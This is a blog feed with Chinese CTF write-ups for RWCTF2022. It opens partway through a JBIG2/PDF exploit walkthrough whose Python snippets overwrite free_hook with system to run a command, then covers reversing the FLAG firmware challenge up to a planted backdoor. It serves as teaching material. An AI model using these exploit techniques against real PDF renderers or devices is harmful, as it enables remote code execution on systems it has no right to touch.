class="number">24</span>, page_bitmap_buf_to_data_ptr)</span><br><span class="line"><span class="comment"># 把立即数8放到+16处</span></span><br><span class="line">mov_q_imm(<span class="number">16</span>, <span class="number">8</span>)</span><br><span class="line"><span class="comment"># 将data指针加上8，并将结果放到+24处</span></span><br><span class="line">add_q_q(<span class="number">24</span>, <span class="number">16</span>)</span><br></pre></td></tr></table></figure><p>计算出这个内存地址的用处是什么呢？继续向下看，注意重头戏快到了：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 取出pagebitmap的data指针的值放到第0个变量的 data 字段</span></span><br><span class="line">rebase_variable_q(<span class="number">0</span>, page_bitmap_buf_to_data_ptr)</span><br><span class="line"><span class="comment"># 取出data指针+8的值，放到第1个变量的 data 字段</span></span><br><span class="line">rebase_variable_q(<span class="number">1</span>, <span class="number">24</span>)</span><br><span class="line"><span class="comment"># 取出第0个变量的值，放到data指针处, 这一步会修改 data 指针为 free_hook_address</span></span><br><span class="line">load_variable(page_bitmap_buf_to_data_ptr, <span class="number">0</span>)</span><br><span class="line"><span class="comment"># 取出第1个变量的值（也就是 libc_system_address），放到+0处，也就是 free_hook 基地址上的那个指针值</span></span><br><span class="line"><span class="comment"># 这样就完成了改写 free hook 的操作</span></span><br><span class="line">load_variable(<span class="number">0</span>, <span class="number">1</span>)</span><br></pre></td></tr></table></figure><p>这样，<strong>此时的 free hook 便被改写成了 libc_system 的地址</strong>，接下来便是尝试执行命令。</p><p>这里再 append 一个 带有待执行命令的  bitmap：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">page0.append(</span><br><span class="line">    GenericRegion(<span class="number">233</span>, x=<span class="number">64</span>, y=<span class="number">0</span>, comb_op=CombOp.And, bitmap=Bitmap(COMMAND_TO_RUN))</span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>这样当 <code>readGenericRegionSeg</code> 函数结束时，新创建的 bitmap（即带有命令的 bitmap）将会被 free 掉，这样就可以触发 <code>system(command)</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readGenericRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                                       GBool lossless, Guint length)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...];</span><br><span class="line">    <span class="comment">// read the bitmap</span></span><br><span class="line">    bitmap = <span class="built_in">readGenericBitmap</span>(mmr, w, h, templ, tpgdOn, gFalse,</span><br><span class="line">                               <span class="literal">NULL</span>, atx, aty, mmr ? length - <span class="number">18</span> : <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// combine the region bitmap into the page bitmap</span></span><br><span class="line">    <span class="keyword">if</span> (imm)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (pageH == <span class="number">0xffffffff</span> &amp;&amp; y + h &gt; curPageH)</span><br><span class="line">        &#123;</span><br><span class="line">            pageBitmap-&gt;<span class="built_in">expand</span>(y + h, pageDefPixel);</span><br><span class="line">        &#125;</span><br><span class="line">        pageBitmap-&gt;<span class="built_in">combine</span>(bitmap, x, y, extCombOp);</span><br><span class="line">        <span class="comment">// 在这里触发 system</span></span><br><span class="line">        <span class="keyword">delete</span> bitmap;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// store the region bitmap</span></span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但有两点需要注意：</p><ol><li><p>imm 必须为 true，这样才能触发 delete 操作。</p></li><li><p>创建的 GenericRegionSeg，其<strong>二维偏移 xy 映射至一维偏移后的偏移量，不能小于 64（即 8 字节）</strong></p><p>这是因为代码中会先执行 <code>pageBitmap-&gt;combine</code> 再执行 <code>delete bitmap</code> 操作。此时的 <code>pageBitmap-&gt;data</code> 为 free hook address，如果执行 combine 时修改了<code>pageBitmap-&gt;data</code> 最低的8个字节，那么 free 时就无法调用到 libc_system，因为保存在 free_hook 上面的 libc_system 地址被破坏了。</p></li></ol><h2 id="六、参考">六、参考</h2><ul><li><p><a href="https://github.com/Riatre/hso-groupie">hso-groupie - Riatre github</a></p></li><li><p><a href="https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution - Google Project Zero</a></p></li><li><p><a href="https://blog.csdn.net/tjcwt2011/article/details/107877566">一个简单PDF文件的结构分析 - CSDN</a></p></li><li><p><a href="https://blog.csdn.net/lacoucou/article/details/114638913">PDF 文件格式 基本结构 - CSDN</a></p></li><li><p><a href="https://www.adobe.com/content/dam/acom/en/devnet/pdf/pdfs/PDF32000_2008.pdf">https://www.adobe.com/content/dam/acom/en/devnet/pdf/pdfs/PDF32000_2008.pdf - Adobe</a></p><blockquote><p>重点在 <code>7.4.7 JBIG2Decode Filter</code> 这节。</p></blockquote></li><li><p><a href="https://github.com/agl/jbig2enc/blob/master/fcd14492.pdf">Coding of Still Pictures : JBIG &amp; JPEG - JBIG Committee</a></p></li></ul>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;p&gt;这里是复盘 RWCTF2022 中 &lt;code&gt;hso groupie&lt;/code&gt; 题时所写下的一些笔记，考点来源于 Project Zero 的 &lt;strong&gt;A deep dive into an NSO zero-click</summary>
      
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>RWCTF2022 Pwn 笔记2 - FLAG Writeup</title>
    <link href="https://kiprey.github.io/2022/01/rwctf2022_flag/"/>
    <id>https://kiprey.github.io/2022/01/rwctf2022_flag/</id>
    <published>2022-01-30T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.083Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><p>这里是复盘 RWCTF2022 中 FLAG 题时所写下的一些笔记。</p><p>由于这题较为复杂，因此需要单独开一个博文来记录。</p><blockquote><p>联合作者：sakura</p></blockquote><!-- more ---><h2 id="一、FLAG-小叙">一、FLAG 小叙</h2><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">FreeRTOS+LwIP+ARM+GoAhead</span><br><span class="line">I don&#x27;t want another backdoor ctf. So I have to say: &quot;There is a backdoor in challange&quot;</span><br><span class="line">The default account in attachment is admin:admin</span><br><span class="line">nc 8.210.44.156 31337</span><br><span class="line">attachment</span><br><span class="line"></span><br><span class="line">Pwn, difficulty:normal</span><br><span class="line">Hint: flag.bin has a backdoor/bugdoor and you&#x27;re supposed to take over it. The flag is not embedded in the binary and will be made available to the appliance via network at runtime, see docker-compose.yml in attachment for details.</span><br></pre></td></tr></table></figure><p>这一题是多个部件组成的一个二进制文件，其中</p><ul><li><a href="https://www.freertos.org/">FreeRTOS</a>：轻量级实时操作系统。<ul><li>无内核，所有任务运行在实模式，可以执行特权指令</li><li>业务逻辑与内核代码一同编译成单个二进制文件，因此无 NX、PIE、ASLR 等。</li><li>无保护模式，因此执行 shellcode 后需要保证 OS 不崩溃。</li></ul></li><li><a href="http://savannah.nongnu.org/projects/lwip/">LwIP</a>：轻量级 TCP/IP 实现，适用于资源较少的轻量级嵌入式系统</li><li>ARM：ARM 32 little-endian 架构</li><li><a href="https://github.com/embedthis/goahead">GoAhead</a>：一个嵌入式微型网页服务</li></ul><p>题目给了一些附件，其中有用的主要有：</p><ul><li><p><code>flag.py</code>：docker 服务会在 <strong>每30s</strong> 向接口 <code>http://localhost:5555/action/backdoor</code> 发送一次 <strong>GET</strong> 请求，如果：</p><ul><li>请求返回 <code>&#123;'status' : 'success'&#125;</code></li><li>请求返回 HTTP 状态码为 <strong>200</strong></li></ul><p>则 <a href="http://flag.py">flag.py</a> 将会加载 flag 并且以 <code>&#123;&quot;flag&quot;: flag&#125;</code> 的形式发送给该 backdoor。</p><p>很明显，我们需要 pwn 掉这个 binary，<strong>伪造一个 backdoor 服务、尝试接收传来的 flag 并输出给用户</strong>。</p></li><li><p><code>flag.bin</code>：题目的二进制附件，这个暂且略过不表。</p></li><li><p><code>dockerfile</code>： 其中记录了 qemu 的启动参数：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-arm \</span><br><span class="line">  -m 64 \</span><br><span class="line">  -nographic \</span><br><span class="line">  -machine vexpress-a9 \</span><br><span class="line">  -net user,hostfwd=tcp::5555-:80 \</span><br><span class="line">  -net nic \</span><br><span class="line">  -kernel /mnt/flag.bin</span><br></pre></td></tr></table></figure></li></ul><p>把题目启动之后，访问 <code>localhost:5555</code>，即可访问到题目 Web 服务的登录界面：</p><p><img src="/2022/01/rwctf2022_flag/image-20220128144627376.png" alt="image-20220128144627376"></p><p>接下来输入账号<code>admin</code>、密码<code>admin</code>，进入到一个普通的小游戏页面，看上去没什么特别的，估计不是重点；直接访问 backdoor 接口，返回 <code>404</code> 界面。</p><p>如果想退出 QEMU, 则在启动 qemu 的终端里，先键入 <code>ctrl + a</code>，之后<strong>抬起这两个键</strong>，并接着按下 <code>x</code> 即可退出。</p><h2 id="二、FLAG-环境搭建">二、FLAG 环境搭建</h2><ul><li><p>下载并安装 IDA BinDiff 插件 - <a href="https://www.zynamics.com/software.html">download link (ladder needed)</a></p><p>网上的教程里描述了安装该插件时需要指定 IDA 安装路径，但是本人实测安装时并没有要求指定 IDA 安装路径，但是 IDA 仍然可以识别并加载 BinDiff 插件。</p><p>BinDiff 将用于恢复 GoAhead 符号。</p></li><li><p>下载多架构 gdb:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install gdb-multiarch</span><br></pre></td></tr></table></figure><p>调试 kernel 的方式：</p><ul><li>在 qemu 启动参数后加上 <code>-gdb tcp::1234</code></li><li>然后使用 <code>gdb-multiarch</code> 执行 <code>target remote localhost:1234</code> 连接 qemu</li></ul></li></ul><h2 id="三、确定内核加载基地址">三、确定内核加载基地址</h2><p>如果我们直接把题目内核拖入 IDA 中，IDA 是无法识别的，因此需要确定并指定加载基地址。</p><blockquote><p>基地址的确定本身就是一件比较难的事情，需要逻辑推理+大胆猜测。</p></blockquote><p>我们先将 flag.bin 拖入 <strong>32 位</strong> IDA（注意是32位） ，指定 Processor Type 为 ARM Little-endian：</p><p><img src="/2022/01/rwctf2022_flag/image-20220128162324429.png" alt="image-20220128162324429"></p><p>之后对前几条指令执行 make code 操作（快捷键 p 或者 c），会生成一系列的内存地址加载指令：</p><p><img src="/2022/01/rwctf2022_flag/image-20220128164704594.png" alt="image-20220128164704594"></p><p>注意到这几条访问内存地址为 <code>0x6001XXXX</code> 的指令，结合 gdb 调试断下的指令位置为 <code>0x60010658</code>：</p><p><img src="/2022/01/rwctf2022_flag/image-20220128164823570.png" alt="image-20220128164823570"></p><p>因此我们可以大胆推断<strong>基地址应该为 0x60010000</strong>。</p><p>加载基地址确定好后，就可以为 IDA 重设基地址。</p><p><img src="/2022/01/rwctf2022_flag/image-20220128151550841.png" alt="image-20220128151550841"></p><p>之后 IDA 便可以分析出<strong>部分</strong>代码等：</p><p><img src="/2022/01/rwctf2022_flag/image-20220128165114508.png" alt="image-20220128165114508"></p><p>接下来还需要全选IDA中的代码+数据，并右键点击 Analyze 进行完整分析，等待它分析完成。</p><p><img src="/2022/01/rwctf2022_flag/image-20220128175327783.png" alt="image-20220128175327783"></p><p>但是这里的分析不会完全的进行分析，因此还需要使用这个 <a href="https://github.com/zh-explorer/ida_script/blob/master/firmware_fix.py">firmware-fix</a> 脚本来进行二次分析，执行自动创建函数体、字符串等操作。（确定了代码区末尾地址为 <code>0x6006F544</code>）</p><blockquote><p>注意：该脚本无法区分出不同的段，因此在这一题中效果一般般… 会把一些明显是数据的东西恢复成函数。</p><p>感兴趣可以看看源码，不长。</p></blockquote><p>执行完成上面的步骤后，仍然有相当一部分的字符串无法使用交叉引用，暂且先这样。</p><p>需要注意的是，<strong>IDA 的反编译引擎 Hex-Ray 需要参考 segment 的信息来生成 C 代码（例如RWX权限情况）</strong>，因此我们最好恢复一下。最简单的方式就是把当前这个 ROM 段权限直接改成 RWX，不过本人根据恢复结果创建了一个 text 段。</p><p><img src="/2022/01/rwctf2022_flag/image-20220128174408119.png" alt="image-20220128174408119"></p><h2 id="四、恢复符号">四、恢复符号</h2><h3 id="a-GoAhead-符号">a. GoAhead 符号</h3><p>现在我们可以尝试恢复 GoAhead 符号。首先通过字符串搜索 + 交叉引用找到 GoAhead 相关的函数：</p><blockquote><p>注意：如果该函数的反汇编无法直接 F5, 则找到该地址的<strong>上一个函数</strong>的<strong>末尾地址</strong>，并右键点击 Create Function ，之后再反编译即可。</p></blockquote><p><img src="/2022/01/rwctf2022_flag/image-20220128175919035.png" alt="image-20220128175919035"></p><p>该函数最后一行有一个字符串说明了 GoAHead 的版本号，为 <code>5.1.5</code>，因此我们可以立即编译一个 5.1.5 的 GoAHead 二进制文件：</p><blockquote><p>这里可以指定使用 arm32 编译器来生成 <a href="http://libgo.so">libgo.so</a>，这样 bindiff 效果会更好。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/embedthis/goahead</span><br><span class="line"><span class="built_in">cd</span> goahead</span><br><span class="line">git checkout v5.1.5</span><br><span class="line">make</span><br><span class="line">file build/linux-x64-default/bin/libgo.so <span class="comment"># 目标文件</span></span><br></pre></td></tr></table></figure><p>将该 <a href="http://libgo.so">libgo.so</a> 目标文件拖到 IDA 里，生成 libgo.idb 数据库文件。之后在开启 flag.bin 的 IDA 中，使用 BinDiff 插件与 libgo.idb 进行比对。</p><p>通过简单的对比，发现 Similarity 大于 0.80 的函数基本上和 <a href="http://libgo.so">libgo.so</a> 的反编译结果能对上，因此我们可以尝试恢复这部分函数的符号上去：</p><blockquote><p>注意，BinDiff 可以通过比较基本块关联、反编译代码关联等来进行比较，因此即便用于比较的两个文件是<strong>不同架构</strong>的，该插件仍然可以比较并输出结果。</p></blockquote><blockquote><p>下图是我恢复 similarity &gt; 0.40 的操作，注意最好不要像我这么冒险，恢复相似度非常低的函数。</p></blockquote><p><img src="/2022/01/rwctf2022_flag/image-20220128181721392.png" alt="image-20220128181721392"></p><p>接下来需要恢复 GoAHead 结构体定义：在 <a href="http://libgo.so">libgo.so</a> 的 IDA 界面中，点击 <code>File -&gt; Produce file -&gt; Create C Header File</code> 将一些结构体定义输出至新的头文件中；之后在 flag.bin IDA 界面中，点击 <code>File -&gt; Load file -&gt; Parse C header file</code> 导入该头文件。</p><h3 id="b-lwIP-符号">b. lwIP 符号</h3><p>题目在启动时便给了版本号：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lwIP-2.1.3 initialized!</span><br></pre></td></tr></table></figure><p>首先下拉代码并编译：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://git.savannah.nongnu.org/git/lwip.git</span><br><span class="line"><span class="built_in">cd</span> lwip</span><br><span class="line">git checkout STABLE-2_1_3_RELEASE</span><br><span class="line">cmake -B build .</span><br><span class="line"><span class="built_in">cd</span> build</span><br><span class="line"><span class="comment"># 安装 ARM 编译器</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install gcc-arm-linux-gnueabihf</span><br><span class="line">CC=arm-linux-gnueabihf-gcc make lwipcore lwipallapps</span><br></pre></td></tr></table></figure><p>make 时遇到各种头文件缺失问题，首先 down 一个 RTOS 源码下来:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 在 lwIP 的同级目录下</span></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/FreeRTOS/FreeRTOS</span><br><span class="line">git submodule update --init --recursive</span><br></pre></td></tr></table></figure><p>之后给 lwIP 打上这个 patch:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">diff --git a/CMakeLists.txt b/CMakeLists.txt</span></span><br><span class="line"><span class="comment">index f05c0f61..a26752f1 100644</span></span><br><span class="line"><span class="comment">--- a/CMakeLists.txt</span></span><br><span class="line"><span class="comment">+++ b/CMakeLists.txt</span></span><br><span class="line"><span class="meta">@@ -14,6 +14,9 @@</span> set(CPACK_PACKAGE_VERSION_PATCH &quot;$&#123;LWIP_VERSION_REVISION&#125;&quot;)</span><br><span class="line"> set(CPACK_SOURCE_IGNORE_FILES &quot;/build/;$&#123;CPACK_SOURCE_IGNORE_FILES&#125;;.git&quot;)</span><br><span class="line"> set(CPACK_SOURCE_PACKAGE_FILE_NAME &quot;lwip-$&#123;LWIP_VERSION_MAJOR&#125;.$&#123;LWIP_VERSION_MINOR&#125;.$&#123;LWIP_VERSION_REVISION&#125;&quot;)</span><br><span class="line"> include(CPack)</span><br><span class="line"><span class="addition">+include_directories (&quot;src/include&quot;)</span></span><br><span class="line"><span class="addition">+include_directories (&quot;test/unit&quot;)</span></span><br><span class="line"><span class="addition">+include_directories (&quot;../FreeRTOS/FreeRTOS/Demo/CORTEX_A9_Zynq_ZC702/RTOSDemo/src/lwIP_Demo/lwIP_port/include&quot;)</span></span><br><span class="line"> </span><br><span class="line"> # Target for package generation</span><br><span class="line"> add_custom_target(dist COMMAND $&#123;CMAKE_MAKE_PROGRAM&#125; package_source)</span><br><span class="line"><span class="comment">diff --git a/src/include/lwip/arch.h b/src/include/lwip/arch.h</span></span><br><span class="line"><span class="comment">index 58dae33a..6159082f 100644</span></span><br><span class="line"><span class="comment">--- a/src/include/lwip/arch.h</span></span><br><span class="line"><span class="comment">+++ b/src/include/lwip/arch.h</span></span><br><span class="line"><span class="meta">@@ -126,8 +126,8 @@</span> typedef uint8_t   u8_t;</span><br><span class="line"> typedef int8_t    s8_t;</span><br><span class="line"> typedef uint16_t  u16_t;</span><br><span class="line"> typedef int16_t   s16_t;</span><br><span class="line"><span class="deletion">-typedef uint32_t  u32_t;</span></span><br><span class="line"><span class="deletion">-typedef int32_t   s32_t;</span></span><br><span class="line"><span class="addition">+// typedef uint32_t  u32_t;</span></span><br><span class="line"><span class="addition">+// typedef int32_t   s32_t;</span></span><br><span class="line"> #if LWIP_HAVE_INT64</span><br><span class="line"> typedef uint64_t  u64_t;</span><br><span class="line"> typedef int64_t   s64_t;</span><br><span class="line"><span class="comment">diff --git a/src/include/lwip/sockets.h b/src/include/lwip/sockets.h</span></span><br><span class="line"><span class="comment">index d70d36c4..ac17f302 100644</span></span><br><span class="line"><span class="comment">--- a/src/include/lwip/sockets.h</span></span><br><span class="line"><span class="comment">+++ b/src/include/lwip/sockets.h</span></span><br><span class="line"><span class="meta">@@ -108,7 +108,7 @@</span> struct sockaddr_storage &#123;</span><br><span class="line"> /* If your port already typedef&#x27;s socklen_t, define SOCKLEN_T_DEFINED</span><br><span class="line">    to prevent this code from redefining it. */</span><br><span class="line"> #if !defined(socklen_t) &amp;&amp; !defined(SOCKLEN_T_DEFINED)</span><br><span class="line"><span class="deletion">-typedef u32_t socklen_t;</span></span><br><span class="line"><span class="addition">+// typedef u32_t socklen_t;</span></span><br><span class="line"> #endif</span><br><span class="line"> </span><br><span class="line"> #if !defined IOV_MAX</span><br><span class="line"><span class="meta">@@ -519,10 +519,10 @@</span> struct pollfd</span><br><span class="line"> #endif</span><br><span class="line"> </span><br><span class="line"> #if LWIP_TIMEVAL_PRIVATE</span><br><span class="line"><span class="deletion">-struct timeval &#123;</span></span><br><span class="line"><span class="deletion">-  long    tv_sec;         /* seconds */</span></span><br><span class="line"><span class="deletion">-  long    tv_usec;        /* and microseconds */</span></span><br><span class="line"><span class="deletion">-&#125;;</span></span><br><span class="line"><span class="addition">+// struct timeval &#123;</span></span><br><span class="line"><span class="addition">+//   long    tv_sec;         /* seconds */</span></span><br><span class="line"><span class="addition">+//   long    tv_usec;        /* and microseconds */</span></span><br><span class="line"><span class="addition">+// &#125;;</span></span><br><span class="line"> #endif /* LWIP_TIMEVAL_PRIVATE */</span><br><span class="line"> </span><br><span class="line"> #define lwip_socket_init() /* Compatibility define, no init needed. */</span><br></pre></td></tr></table></figure><p>之后重新执行上述的编译操作即可。</p><p>但是这样编译出来的竟然是<strong>静态链接库</strong>，没法拖到 IDA 里分析，因此还需要修改一下 CMakeList 中的东西：</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">diff --git a/src/Filelists.cmake b/src/Filelists.cmake</span></span><br><span class="line"><span class="comment">index 21d7b490..179f5716 100644</span></span><br><span class="line"><span class="comment">--- a/src/Filelists.cmake</span></span><br><span class="line"><span class="comment">+++ b/src/Filelists.cmake</span></span><br><span class="line"><span class="meta">@@ -268,12 +268,12 @@</span> else (DOXYGEN_FOUND)</span><br><span class="line"> endif (DOXYGEN_FOUND)</span><br><span class="line"> </span><br><span class="line"> # lwIP libraries</span><br><span class="line"><span class="deletion">-add_library(lwipcore EXCLUDE_FROM_ALL $&#123;lwipnoapps_SRCS&#125;)</span></span><br><span class="line"><span class="addition">+add_library(lwipcore SHARED $&#123;lwipnoapps_SRCS&#125;)</span></span><br><span class="line"> target_compile_options(lwipcore PRIVATE $&#123;LWIP_COMPILER_FLAGS&#125;)</span><br><span class="line"> target_compile_definitions(lwipcore PRIVATE $&#123;LWIP_DEFINITIONS&#125;  $&#123;LWIP_MBEDTLS_DEFINITIONS&#125;)</span><br><span class="line"> target_include_directories(lwipcore PRIVATE $&#123;LWIP_INCLUDE_DIRS&#125; $&#123;LWIP_MBEDTLS_INCLUDE_DIRS&#125;)</span><br><span class="line"> </span><br><span class="line"><span class="deletion">-add_library(lwipallapps EXCLUDE_FROM_ALL $&#123;lwipallapps_SRCS&#125;)</span></span><br><span class="line"><span class="addition">+add_library(lwipallapps SHARED $&#123;lwipallapps_SRCS&#125;)</span></span><br><span class="line"> target_compile_options(lwipallapps PRIVATE $&#123;LWIP_COMPILER_FLAGS&#125;)</span><br><span class="line"> target_compile_definitions(lwipallapps PRIVATE $&#123;LWIP_DEFINITIONS&#125;  $&#123;LWIP_MBEDTLS_DEFINITIONS&#125;)</span><br><span class="line"> target_include_directories(lwipallapps PRIVATE $&#123;LWIP_INCLUDE_DIRS&#125; $&#123;LWIP_MBEDTLS_INCLUDE_DIRS&#125;)</span><br></pre></td></tr></table></figure><p>然后编译报错，提示 :</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/bin/ld: errno: TLS definition <span class="keyword">in</span> /lib/x86_64-linux-gnu/libc.so.6 section .tbss mismatches non-TLS reference <span class="keyword">in</span> CMakeFiles/lwipcore.dir/src/api/if_api.c.o</span><br></pre></td></tr></table></figure><p>将某个头文件中的 <code>extern errno</code> 替换掉即可：</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">diff --git a/src/include/lwip/errno.h b/src/include/lwip/errno.h</span></span><br><span class="line"><span class="comment">index 48d6b539..acd7817f 100644</span></span><br><span class="line"><span class="comment">--- a/src/include/lwip/errno.h</span></span><br><span class="line"><span class="comment">+++ b/src/include/lwip/errno.h</span></span><br><span class="line"><span class="meta">@@ -174,7 +174,8 @@</span> extern &quot;C&quot; &#123;</span><br><span class="line"> #define  EMEDIUMTYPE    124  /* Wrong medium type */</span><br><span class="line"> </span><br><span class="line"> #ifndef errno</span><br><span class="line"><span class="deletion">-extern int errno;</span></span><br><span class="line"><span class="addition">+// extern int errno;</span></span><br><span class="line"><span class="addition">+#include &lt;errno.h&gt;</span></span><br><span class="line"> #endif</span><br><span class="line"> </span><br><span class="line"> #else /* LWIP_PROVIDE_ERRNO */</span><br></pre></td></tr></table></figure><p>成功编译出 .so 动态链接库。之后照着上面的步骤恢复符号即可。</p><blockquote><p>后来才发现，这里恢复 lwIP 符号的操作并没有什么用处，纯当是踩坑记录了。</p></blockquote><h2 id="五、漏洞思路">五、漏洞思路</h2><p>接下来可以看看字符串表中有哪些有用的信息：</p><p><img src="/2022/01/rwctf2022_flag/image-20220128195501667.png" alt="image-20220128195501667"></p><p>看上去都很有趣，但是都找不到交叉引用（恢复的还是不够好）。</p><p>不过可以<strong>通过全局搜索字符串的地址</strong>来找到引用的地方。</p><p><img src="/2022/01/rwctf2022_flag/image-20220128202705045.png" alt="image-20220128202705045"></p><p>继续向上交叉引用，找到该函数，可以看到注册了一个 submit 动作，其事件处理例程就是上一个找到的函数。继续交叉引用发现除了注册了 submit 动作以外，还注册了 login 和 logout 动作，不过这两个动作看上去用处不大，暂且忽略不看。</p><p><img src="/2022/01/rwctf2022_flag/image-20220128211258805.png" alt="image-20220128211258805"></p><p>那如何调用这个 submit 呢？通过字符串搜索可以得出 <code>/web/submit.jst</code> 这个路由路径，因此我们可以通过访问 <code>http://localhost:5555/submit.jst</code> URL 来进入这个页面：</p><p><img src="/2022/01/rwctf2022_flag/image-20220128211958598.png" alt="image-20220128211958598"></p><p>通过先前的逆向过程和网络抓包可以得知，<strong>GoAHead 会使用到 Session 技术</strong>。因此若我们在该界面提交一串数据后，当我们下一次再访问这个界面，则<strong>先前提交的数据将仍然会显示在这里</strong>。</p><p>submit 接口暂时告一段落。根据打题的师傅所说，GoAHead 除了增加 submit 功能以外，其余部分基本没动过。根据我进一步所查询的资料，backdoor 应该是位于 <strong>RT-thread（一个国产 RTOS） 中 lwIP模块 的 smc911x 驱动</strong>中…</p><blockquote><p>沉思，这个 backdoor 其他师傅们是怎么找出来的…</p></blockquote><p>这里直接开天眼，backdoor 位于地址 <code>0x6001B024</code> 中（<a href="https://github.com/RT-Thread/rt-thread/blob/master/bsp/qemu-vexpress-a9/drivers/drv_smc911x.c#L447">smc911x_eth_rx 函数</a>，用于接收数据包），以下是 IDA 反编译+自己简单恢复符号后的结果：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 